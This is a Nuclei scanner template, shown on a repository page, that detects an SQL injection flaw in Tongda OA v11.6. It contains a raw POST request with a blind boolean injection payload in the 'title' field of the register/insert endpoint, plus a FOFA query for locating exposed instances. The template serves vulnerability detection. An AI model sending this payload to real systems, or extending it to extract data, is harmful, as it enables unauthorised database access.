nuclei-templates/http/vulnerabilities/tongda/tongda-insert-sqli.yaml

35 lines
1.0 KiB
YAML
Raw Normal View History

2023-09-07 07:06:21 +00:00
id: tongda-insert-sqli
info:
name: Tongda OA v11.6 Insert Parameter - SQL Injection
author: SleepingBag945
severity: high
description: |
Tongda OA v11.6 insert parameters contain SQL injection vulnerabilities, through which attackers can obtain sensitive database information
reference:
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.6%20insert%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata:
max-request: 1
fofa-query: app="TDXK-通达OA"
verified: true
tags: tongda,sqli
http:
- raw:
- |
POST /general/document/index.php/recv/register/insert HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER=
matchers-condition: and
matchers:
- type: word
part: header
words:
- "PHPSESSID="
- type: status
status:
- 302